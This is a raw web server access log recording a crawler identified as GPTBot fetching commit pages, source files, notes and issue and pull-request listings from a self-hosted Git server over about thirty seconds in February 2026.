"/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fwatchdog_service.py" [Client 74.7.227.38] [Length 25021] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:19:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d" [Client 74.7.227.38] [Length 66877] [Gzip 10.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:19:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118292] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71841] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71843] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71843] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118425] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118425] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:19:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15594] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:19:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:19:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" +[17/Feb/2026:19:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 